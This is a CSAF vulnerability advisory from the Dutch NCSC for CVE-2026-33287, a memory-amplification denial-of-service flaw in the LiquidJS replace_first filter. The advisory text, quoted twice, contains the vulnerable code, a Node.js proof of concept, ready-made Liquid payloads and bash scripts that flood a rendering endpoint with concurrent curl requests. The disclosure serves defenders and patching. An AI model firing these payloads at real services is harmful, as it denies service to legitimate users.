{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33287", "tracking": { "current_release_date": "2026-03-30T17:26:27.556298Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33287", "initial_release_date": "2026-03-25T18:42:39.113022Z", "revision_history": [ { "date": "2026-03-25T18:42:39.113022Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-25T18:42:48.050675Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-26T01:25:09.382452Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-26T01:25:12.222587Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-26T01:39:01.960611Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-26T01:39:04.910643Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-26T07:35:41.856281Z", "number": "7", "summary": "NCSC Score updated." }, { "date": "2026-03-26T15:02:08.542744Z", "number": "8", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-26T15:38:59.502878Z", "number": "9", "summary": "Unknown change." }, { "date": "2026-03-27T11:16:57.189921Z", "number": "10", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-30T14:40:32.124516Z", "number": "11", "summary": "References created (1)." }, { "date": "2026-03-30T17:25:10.469034Z", "number": "12", "summary": "Products created (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-30T17:25:17.392032Z", "number": "13", "summary": "NCSC Score updated." } ], "status": "interim", "version": "13" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<10.25.1", "product": { "name": "vers:unknown/<10.25.1", "product_id": "CSAFPID-5913695" } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<=10.24.0", "product": { "name": "vers:unknown/>=0|<=10.24.0", "product_id": "CSAFPID-5937998" } } ], "category": "product_name", "name": "liquidjs" } ], "category": "vendor", "name": "harttle" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<10.25.1", "product": { "name": "vers:unknown/<10.25.1", "product_id": "CSAFPID-5965484", "product_identification_helper": { "cpe": "cpe:2.3:a:liquidjs:liquidjs:*:*:*:*:*:node.js:*:*" } } } ], "category": "product_name", "name": "liquidjs" } ], "category": "vendor", "name": "liquidjs" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33287", "notes": [ { "category": "description", "text": "### Summary\nThe `replace_first` filter in LiquidJS uses JavaScript's `String.prototype.replace()` which interprets `$&` as a backreference to the matched substring. The filter only charges `memoryLimit` for the input string length, not the amplified output. An attacker can achieve exponential memory amplification (up to 625,000:1) while staying within the `memoryLimit` budget, leading to denial of service.\n\n### Details\nThe `replace_first` filter in `src/builtin/filters/string.ts:130-133` delegates to JavaScript's native `String.prototype.replace()`. This native method interprets special replacement patterns including `$&` (insert the matched substring), `$'` (insert the portion after the match), and `` $` `` (insert the portion before the match).\n\nThe filter calls `memoryLimit.use(str.length)` to account for the **input** string's memory cost, but the **output** string — potentially many times larger due to `$&` expansion — is never charged against the memory limit.\n\nAn attacker can build a 1MB string (within `memoryLimit` budget), then use `replace_first` with a replacement string containing 50 repetitions of `$&`. Each `$&` expands to the full matched string (1MB), producing a 50MB output that is not charged to the memory counter.\n\nBy chaining this technique across multiple variable assignments, exponential amplification is achieved:\n\n| Stage | Input Size | `$&` Repetitions | Output Size | Cumulative `memoryLimit` Charge |\n|-------|-----------|-------------------|-------------|-------------------------------|\n| 1 | 1 byte | 50 | 50 bytes | ~1 byte |\n| 2 | 50 bytes | 50 | 2,500 bytes | ~51 bytes |\n| 3 | 2,500 bytes | 50 | 125 KB | ~2.6 KB |\n| 4 | 125 KB | 50 | 6.25 MB | ~128 KB |\n| 5 | 6.25 MB | 50 | 312.5 MB | ~6.38 MB |\n\n**Total amplification factor: ~625,000:1** (312.5 MB output vs. ~6.38 MB charged to `memoryLimit`).\n\nNotably, the sibling `replace` filter uses `str.split(pattern).join(replacement)`, which treats `$&` as a literal string and is therefore not vulnerable. The `replace_last` filter uses manual substring operations and is also safe. Only `replace_first` is affected.\n\n```typescript\n// src/builtin/filters/string.ts:130-133 — VULNERABLE\nexport function replace_first (v: string, arg1: string, arg2: string) {\n const str = stringify(v)\n this.context.memoryLimit.use(str.length) // Only charges input\n return str.replace(stringify(arg1), arg2) // $& expansion uncharged!\n}\n\n// src/builtin/filters/string.ts:125-129 — SAFE (for comparison)\nexport function replace (v: string, arg1: string, arg2: string) {\n const str = stringify(v)\n this.context.memoryLimit.use(str.length)\n return str.split(stringify(arg1)).join(arg2) // split/join: $& treated as literal\n}\n```\n\n### PoC\n**Prerequisites**:\n- `npm install liquidjs@10.24.0`\n- An application that renders user-provided Liquid templates (CMS, newsletter editor, SaaS platform, etc.)\n\nSave the following as `poc_replace_first_amplification.js` and run with `node poc_replace_first_amplification.js`:\n\n```javascript\nconst { Liquid } = require('liquidjs');\n\n(async () => {\n const engine = new Liquid({ memoryLimit: 1e8 }); // 100MB limit\n\n // Step 1 — Verify $& expansion in replace_first\n console.log('=== Step 1: $& expansion in replace_first ===');\n const step1 = '{{ \"HELLO\" | replace_first: \"HELLO\", \"$&-$&-$&\" }}';\n console.log('Result:', await engine.parseAndRender(step1));\n // Output: \"HELLO-HELLO-HELLO\" — $& expanded to matched string\n\n // Step 2 — Verify replace (split/join) is safe\n console.log('\\n=== Step 2: replace is safe ===');\n const step2 = '{{ \"ABCDE\" | replace: \"ABCDE\", \"$&$&$&\" }}';\n console.log('Result:', await engine.parseAndRender(step2));\n // Output: \"$&$&$&\" — $& treated as literal\n\n // Step 3 — 5-stage exponential amplification (50x per stage)\n console.log('\\n=== Step 3: Exponential amplification (625,000:1) ===');\n const amp50 = '$&'.repeat(50);\n const step3 = [\n '{% assign s = \"A\" %}',\n '{% assign s = s | replace_first: s, \"' + amp50 + '\" %}',\n '{% assign s = s | replace_first: s, \"' + amp50 + '\" %}',\n '{% assign s = s | replace_first: s, \"' + amp50 + '\" %}',\n '{% assign s = s | replace_first: s, \"' + amp50 + '\" %}',\n '{% assign s = s | replace_first: s, \"' + amp50 + '\" %}',\n '{{ s | size }}'\n ].join('');\n\n const startMem = process.memoryUsage().heapUsed;\n const result = await engine.parseAndRender(step3);\n const endMem = process.memoryUsage().heapUsed;\n\n console.log('Output string size:', result.trim(), 'bytes'); // \"312500000\"\n console.log('Heap increase:', ((endMem - startMem) / 1e6).toFixed(1), 'MB');\n console.log('Amplification: ~625,000:1 (1 byte input -> 312.5 MB output)');\n console.log('memoryLimit charged: < 7 MB (only input lengths counted)');\n})();\n```\n\n**Expected output:**\n\n```\n=== Step 1: $& expansion in replace_first ===\nResult: HELLO-HELLO-HELLO\n\n=== Step 2: replace is safe ===\nResult: $&$&$&\n\n=== Step 3: Exponential amplification (625,000:1) ===\nOutput string size: 312500000 bytes\nHeap increase: ~625.0 MB\nAmplification: ~625,000:1 (1 byte input → 312.5 MB output)\nmemoryLimit charged: < 7 MB (only input lengths counted)\n```\n\nThe `memoryLimit` of 100MB is completely bypassed — 312.5 MB is allocated while only ~6.38 MB is charged to the memory counter.\n\n#### Demonstrated Denial of Service (concurrent attack)\n\nAfter confirming the single-request PoC, launch 20 concurrent attacks + legitimate user requests to measure actual service disruption.\n\n**Raw Liquid template payload sent by attacker:**\n```liquid\n{% assign s = \"A\" %}\n{% assign s = s | replace_first: s, \"$&$&$&...(50 times)...$&\" %}\n{% assign s = s | replace_first: s, \"$&$&$&...(50 times)...$&\" %}\n{% assign s = s | replace_first: s, \"$&$&$&...(50 times)...$&\" %}\n{% assign s = s | replace_first: s, \"$&$&$&...(50 times)...$&\" %}\n{% assign s = s | replace_first: s, \"$&$&$&...(50 times)...$&\" %}\n{{ s }}\n```\n\n> `$&` is a JavaScript `String.prototype.replace()` backreference pattern that inserts the entire matched string. Each stage amplifies 50x → 5 stages = 50^5 = 312,500,000 characters (~312.5MB). `{{ s }}` forces the full output into the HTTP response, keeping memory allocated during transfer and blocking the Node.js event loop.\n\n```bash\n#!/bin/bash\n# DoS demonstration: 20 concurrent attacks + legitimate user latency measurement\n\nDOLLAR='$&'\nREP50=$(printf \"${DOLLAR}%.0s\" {1..50})\nPAYLOAD=\"{% assign s = \\\"A\\\" %}{% assign s = s | replace_first: s, \\\"${REP50}\\\" %}{% assign s = s | replace_first: s, \\\"${REP50}\\\" %}{% assign s = s | replace_first: s, \\\"${REP50}\\\" %}{% assign s = s | replace_first: s, \\\"${REP50}\\\" %}{% assign s = s | replace_first: s, \\\"${REP50}\\\" %}{{ s }}\"\n\necho \"=== Advisory 2 DoS: 20 concurrent + normal user ===\"\n\n# 20 DoS attack requests (per-request timing)\nfor i in $(seq 1 20); do\n (\n t1=$(date +%s%3N)\n curl -s -o /dev/null --max-time 120 -X POST \"http:///newsletter/preview\" \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n --data-urlencode \"template=$PAYLOAD\"\n t2=$(date +%s%3N)\n echo \"DoS[$i]: $(( t2 - t1 ))ms\"\n ) &\ndone\n\n# Legitimate user requests at 0s, 3s, 6s\n(\n t1=$(date +%s%3N)\n curl -s -o /dev/null --max-time 60 -X POST \"http:///newsletter/preview\" \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n --data-urlencode \"template=

Hello

\"\n t2=$(date +%s%3N)\n echo \"Normal[0s]: $(( t2 - t1 ))ms\"\n) &\n\n(\n sleep 3\n t1=$(date +%s%3N)\n curl -s -o /dev/null --max-time 60 -X POST \"http:///newsletter/preview\" \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n --data-urlencode \"template=

Hello

\"\n t2=$(date +%s%3N)\n echo \"Normal[3s]: $(( t2 - t1 ))ms\"\n) &\n\n(\n sleep 6\n t1=$(date +%s%3N)\n curl -s -o /dev/null --max-time 60 -X POST \"http:///newsletter/preview\" \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n --data-urlencode \"template=

Hello

\"\n t2=$(date +%s%3N)\n echo \"Normal[6s]: $(( t2 - t1 ))ms\"\n) &\n\nwait\necho \"=== Done ===\"\n```\n\n**Empirical results** (Node.js v20.20.1, LiquidJS 10.24.0):\n```\nNormal[0s]: 13047ms ← request sent concurrently with attack — 13s delay\nNormal[3s]: 10124ms ← still blocked 3 seconds later — 10s delay\nNormal[6s]: 7186ms ← still blocked 6 seconds later — 7s delay\nDoS[1]: 14729ms\nDoS[2-20]: 17747ms ~ 25353ms\n```\n\nWith 20 concurrent requests, legitimate users experience **up to 13-second delays**. Requests sent 6 seconds after the attack began still take 7 seconds, confirming sustained service disruption throughout the ~25-second attack window. Each attack request costs only ~500 bytes.\n\n#### HTTP Reproduction (for applications that accept user templates)\n\n```bash\n# $& expansion — should return \"HELLO-HELLO-HELLO\"\ncurl -s -X POST http:///render \\\n -H \"Content-Type: application/json\" \\\n -d '{\"template\": \"{{ \\\"HELLO\\\" | replace_first: \\\"HELLO\\\", \\\"$&-$&-$&\\\" }}\"}'\n\n# replace is safe — should return literal \"$&$&$&\"\ncurl -s -X POST http:///render \\\n -H \"Content-Type: application/json\" \\\n -d '{\"template\": \"{{ \\\"ABCDE\\\" | replace: \\\"ABCDE\\\", \\\"$&$&$&\\\" }}\"}'\n\n# 5-stage 50x amplification — produces ~312.5MB response\ncurl -s -X POST http:///render \\\n -H \"Content-Type: application/json\" \\\n -d '{\"template\": \"{% assign s = \\\"A\\\" %}{% assign s = s | replace_first: s, \\\"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\\\" %}{% assign s = s | replace_first: s, \\\"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\\\" %}{% assign s = s | replace_first: s, \\\"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\\\" %}{% assign s = s | replace_first: s, \\\"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\\\" %}{% assign s = s | replace_first: s, \\\"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\\\" %}{{ s | size }}\"}'\n```\n```bash\n# 20 concurrent DoS attack requests\nfor i in $(seq 1 20); do\n curl -s -o /dev/null --max-time 120 -X POST \"http:///render\" \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n --data-urlencode 'template={% assign s = \"A\" %}{% assign s = s | replace_first: s, \"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\" %}{% assign s = s | replace_first: s, \"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\" %}{% assign s = s | replace_first: s, \"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\" %}{% assign s = s | replace_first: s, \"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\" %}{% assign s = s | replace_first: s, \"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\" %}{{ s }}' &\ndone\n\n# Legitimate user request (concurrent)\ncurl -w \"Normal: %{time_total}s\\n\" -s -o /dev/null --max-time 60 -X POST \"http:///render\" \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n --data-urlencode 'template=

Hello

' &\n\nwait\n```\n\nReplace `http:///render` with the actual template rendering endpoint. The payload is pure Liquid syntax and works regardless of the HTTP framework.\n\n### Impact\n- **`memoryLimit` security bypass**: The memory limit is rendered ineffective for templates using `replace_first` with `$&` patterns.\n- **Demonstrated Denial of Service**: A single request allocates 312.5 MB (625 MB heap). Concurrent requests cause **complete service unavailability**. Due to Node.js single-threaded architecture, the event loop is blocked and all legitimate user requests are stalled.\n- **Measured service disruption** (LiquidJS 10.24.0, Node.js v20, empirically verified):\n\n | Concurrent Attack Requests | Legitimate User Latency | vs. Baseline | Server Blocked |\n |---------------------------|------------------------|-------------|---------------|\n | 10 | 3.2s | **640x** | ~11s |\n | 20 | **10.9s** | **2,180x** | ~29s |\n\n With 20 concurrent requests, legitimate user requests are **delayed by 10.9 seconds** and the server becomes **completely unresponsive for 29 seconds**. Requests sent 6 seconds after the attack began still took 8 seconds, confirming sustained service disruption throughout the attack window. The attack cost is ~500 bytes per HTTP request.", "title": "github - https://api.github.com/advisories/GHSA-6q5m-63h6-5x4v" }, { "category": "description", "text": "LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to version 10.25.1, the `replace_first` filter in LiquidJS uses JavaScript's `String.prototype.replace()` which interprets `$&` as a back reference to the matched substring. The filter only charges `memoryLimit` for the input string length, not the amplified output. An attacker can achieve exponential memory amplification (up to 625,000:1) while staying within the `memoryLimit` budget, leading to denial of service. Version 10.25.1 patches the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33287" }, { "category": "description", "text": "LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to version 10.25.1, the `replace_first` filter in LiquidJS uses JavaScript's `String.prototype.replace()` which interprets `$&` as a back reference to the matched substring. The filter only charges `memoryLimit` for the input string length, not the amplified output. An attacker can achieve exponential memory amplification (up to 625,000:1) while staying within the `memoryLimit` budget, leading to denial of service. Version 10.25.1 patches the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33287.json" }, { "category": "description", "text": "### Summary\nThe `replace_first` filter in LiquidJS uses JavaScript's `String.prototype.replace()` which interprets `$&` as a backreference to the matched substring. The filter only charges `memoryLimit` for the input string length, not the amplified output. An attacker can achieve exponential memory amplification (up to 625,000:1) while staying within the `memoryLimit` budget, leading to denial of service.\n\n### Details\nThe `replace_first` filter in `src/builtin/filters/string.ts:130-133` delegates to JavaScript's native `String.prototype.replace()`. This native method interprets special replacement patterns including `$&` (insert the matched substring), `$'` (insert the portion after the match), and `` $` `` (insert the portion before the match).\n\nThe filter calls `memoryLimit.use(str.length)` to account for the **input** string's memory cost, but the **output** string — potentially many times larger due to `$&` expansion — is never charged against the memory limit.\n\nAn attacker can build a 1MB string (within `memoryLimit` budget), then use `replace_first` with a replacement string containing 50 repetitions of `$&`. Each `$&` expands to the full matched string (1MB), producing a 50MB output that is not charged to the memory counter.\n\nBy chaining this technique across multiple variable assignments, exponential amplification is achieved:\n\n| Stage | Input Size | `$&` Repetitions | Output Size | Cumulative `memoryLimit` Charge |\n|-------|-----------|-------------------|-------------|-------------------------------|\n| 1 | 1 byte | 50 | 50 bytes | ~1 byte |\n| 2 | 50 bytes | 50 | 2,500 bytes | ~51 bytes |\n| 3 | 2,500 bytes | 50 | 125 KB | ~2.6 KB |\n| 4 | 125 KB | 50 | 6.25 MB | ~128 KB |\n| 5 | 6.25 MB | 50 | 312.5 MB | ~6.38 MB |\n\n**Total amplification factor: ~625,000:1** (312.5 MB output vs. ~6.38 MB charged to `memoryLimit`).\n\nNotably, the sibling `replace` filter uses `str.split(pattern).join(replacement)`, which treats `$&` as a literal string and is therefore not vulnerable. The `replace_last` filter uses manual substring operations and is also safe. Only `replace_first` is affected.\n\n```typescript\n// src/builtin/filters/string.ts:130-133 — VULNERABLE\nexport function replace_first (v: string, arg1: string, arg2: string) {\n const str = stringify(v)\n this.context.memoryLimit.use(str.length) // Only charges input\n return str.replace(stringify(arg1), arg2) // $& expansion uncharged!\n}\n\n// src/builtin/filters/string.ts:125-129 — SAFE (for comparison)\nexport function replace (v: string, arg1: string, arg2: string) {\n const str = stringify(v)\n this.context.memoryLimit.use(str.length)\n return str.split(stringify(arg1)).join(arg2) // split/join: $& treated as literal\n}\n```\n\n### PoC\n**Prerequisites**:\n- `npm install liquidjs@10.24.0`\n- An application that renders user-provided Liquid templates (CMS, newsletter editor, SaaS platform, etc.)\n\nSave the following as `poc_replace_first_amplification.js` and run with `node poc_replace_first_amplification.js`:\n\n```javascript\nconst { Liquid } = require('liquidjs');\n\n(async () => {\n const engine = new Liquid({ memoryLimit: 1e8 }); // 100MB limit\n\n // Step 1 — Verify $& expansion in replace_first\n console.log('=== Step 1: $& expansion in replace_first ===');\n const step1 = '{{ \"HELLO\" | replace_first: \"HELLO\", \"$&-$&-$&\" }}';\n console.log('Result:', await engine.parseAndRender(step1));\n // Output: \"HELLO-HELLO-HELLO\" — $& expanded to matched string\n\n // Step 2 — Verify replace (split/join) is safe\n console.log('\\n=== Step 2: replace is safe ===');\n const step2 = '{{ \"ABCDE\" | replace: \"ABCDE\", \"$&$&$&\" }}';\n console.log('Result:', await engine.parseAndRender(step2));\n // Output: \"$&$&$&\" — $& treated as literal\n\n // Step 3 — 5-stage exponential amplification (50x per stage)\n console.log('\\n=== Step 3: Exponential amplification (625,000:1) ===');\n const amp50 = '$&'.repeat(50);\n const step3 = [\n '{% assign s = \"A\" %}',\n '{% assign s = s | replace_first: s, \"' + amp50 + '\" %}',\n '{% assign s = s | replace_first: s, \"' + amp50 + '\" %}',\n '{% assign s = s | replace_first: s, \"' + amp50 + '\" %}',\n '{% assign s = s | replace_first: s, \"' + amp50 + '\" %}',\n '{% assign s = s | replace_first: s, \"' + amp50 + '\" %}',\n '{{ s | size }}'\n ].join('');\n\n const startMem = process.memoryUsage().heapUsed;\n const result = await engine.parseAndRender(step3);\n const endMem = process.memoryUsage().heapUsed;\n\n console.log('Output string size:', result.trim(), 'bytes'); // \"312500000\"\n console.log('Heap increase:', ((endMem - startMem) / 1e6).toFixed(1), 'MB');\n console.log('Amplification: ~625,000:1 (1 byte input -> 312.5 MB output)');\n console.log('memoryLimit charged: < 7 MB (only input lengths counted)');\n})();\n```\n\n**Expected output:**\n\n```\n=== Step 1: $& expansion in replace_first ===\nResult: HELLO-HELLO-HELLO\n\n=== Step 2: replace is safe ===\nResult: $&$&$&\n\n=== Step 3: Exponential amplification (625,000:1) ===\nOutput string size: 312500000 bytes\nHeap increase: ~625.0 MB\nAmplification: ~625,000:1 (1 byte input → 312.5 MB output)\nmemoryLimit charged: < 7 MB (only input lengths counted)\n```\n\nThe `memoryLimit` of 100MB is completely bypassed — 312.5 MB is allocated while only ~6.38 MB is charged to the memory counter.\n\n#### Demonstrated Denial of Service (concurrent attack)\n\nAfter confirming the single-request PoC, launch 20 concurrent attacks + legitimate user requests to measure actual service disruption.\n\n**Raw Liquid template payload sent by attacker:**\n```liquid\n{% assign s = \"A\" %}\n{% assign s = s | replace_first: s, \"$&$&$&...(50 times)...$&\" %}\n{% assign s = s | replace_first: s, \"$&$&$&...(50 times)...$&\" %}\n{% assign s = s | replace_first: s, \"$&$&$&...(50 times)...$&\" %}\n{% assign s = s | replace_first: s, \"$&$&$&...(50 times)...$&\" %}\n{% assign s = s | replace_first: s, \"$&$&$&...(50 times)...$&\" %}\n{{ s }}\n```\n\n> `$&` is a JavaScript `String.prototype.replace()` backreference pattern that inserts the entire matched string. Each stage amplifies 50x → 5 stages = 50^5 = 312,500,000 characters (~312.5MB). `{{ s }}` forces the full output into the HTTP response, keeping memory allocated during transfer and blocking the Node.js event loop.\n\n```bash\n#!/bin/bash\n# DoS demonstration: 20 concurrent attacks + legitimate user latency measurement\n\nDOLLAR='$&'\nREP50=$(printf \"${DOLLAR}%.0s\" {1..50})\nPAYLOAD=\"{% assign s = \\\"A\\\" %}{% assign s = s | replace_first: s, \\\"${REP50}\\\" %}{% assign s = s | replace_first: s, \\\"${REP50}\\\" %}{% assign s = s | replace_first: s, \\\"${REP50}\\\" %}{% assign s = s | replace_first: s, \\\"${REP50}\\\" %}{% assign s = s | replace_first: s, \\\"${REP50}\\\" %}{{ s }}\"\n\necho \"=== Advisory 2 DoS: 20 concurrent + normal user ===\"\n\n# 20 DoS attack requests (per-request timing)\nfor i in $(seq 1 20); do\n (\n t1=$(date +%s%3N)\n curl -s -o /dev/null --max-time 120 -X POST \"http:///newsletter/preview\" \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n --data-urlencode \"template=$PAYLOAD\"\n t2=$(date +%s%3N)\n echo \"DoS[$i]: $(( t2 - t1 ))ms\"\n ) &\ndone\n\n# Legitimate user requests at 0s, 3s, 6s\n(\n t1=$(date +%s%3N)\n curl -s -o /dev/null --max-time 60 -X POST \"http:///newsletter/preview\" \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n --data-urlencode \"template=

Hello

\"\n t2=$(date +%s%3N)\n echo \"Normal[0s]: $(( t2 - t1 ))ms\"\n) &\n\n(\n sleep 3\n t1=$(date +%s%3N)\n curl -s -o /dev/null --max-time 60 -X POST \"http:///newsletter/preview\" \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n --data-urlencode \"template=

Hello

\"\n t2=$(date +%s%3N)\n echo \"Normal[3s]: $(( t2 - t1 ))ms\"\n) &\n\n(\n sleep 6\n t1=$(date +%s%3N)\n curl -s -o /dev/null --max-time 60 -X POST \"http:///newsletter/preview\" \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n --data-urlencode \"template=

Hello

\"\n t2=$(date +%s%3N)\n echo \"Normal[6s]: $(( t2 - t1 ))ms\"\n) &\n\nwait\necho \"=== Done ===\"\n```\n\n**Empirical results** (Node.js v20.20.1, LiquidJS 10.24.0):\n```\nNormal[0s]: 13047ms ← request sent concurrently with attack — 13s delay\nNormal[3s]: 10124ms ← still blocked 3 seconds later — 10s delay\nNormal[6s]: 7186ms ← still blocked 6 seconds later — 7s delay\nDoS[1]: 14729ms\nDoS[2-20]: 17747ms ~ 25353ms\n```\n\nWith 20 concurrent requests, legitimate users experience **up to 13-second delays**. Requests sent 6 seconds after the attack began still take 7 seconds, confirming sustained service disruption throughout the ~25-second attack window. Each attack request costs only ~500 bytes.\n\n#### HTTP Reproduction (for applications that accept user templates)\n\n```bash\n# $& expansion — should return \"HELLO-HELLO-HELLO\"\ncurl -s -X POST http:///render \\\n -H \"Content-Type: application/json\" \\\n -d '{\"template\": \"{{ \\\"HELLO\\\" | replace_first: \\\"HELLO\\\", \\\"$&-$&-$&\\\" }}\"}'\n\n# replace is safe — should return literal \"$&$&$&\"\ncurl -s -X POST http:///render \\\n -H \"Content-Type: application/json\" \\\n -d '{\"template\": \"{{ \\\"ABCDE\\\" | replace: \\\"ABCDE\\\", \\\"$&$&$&\\\" }}\"}'\n\n# 5-stage 50x amplification — produces ~312.5MB response\ncurl -s -X POST http:///render \\\n -H \"Content-Type: application/json\" \\\n -d '{\"template\": \"{% assign s = \\\"A\\\" %}{% assign s = s | replace_first: s, \\\"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\\\" %}{% assign s = s | replace_first: s, \\\"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\\\" %}{% assign s = s | replace_first: s, \\\"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\\\" %}{% assign s = s | replace_first: s, \\\"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\\\" %}{% assign s = s | replace_first: s, \\\"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\\\" %}{{ s | size }}\"}'\n```\n```bash\n# 20 concurrent DoS attack requests\nfor i in $(seq 1 20); do\n curl -s -o /dev/null --max-time 120 -X POST \"http:///render\" \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n --data-urlencode 'template={% assign s = \"A\" %}{% assign s = s | replace_first: s, \"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\" %}{% assign s = s | replace_first: s, \"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\" %}{% assign s = s | replace_first: s, \"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\" %}{% assign s = s | replace_first: s, \"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\" 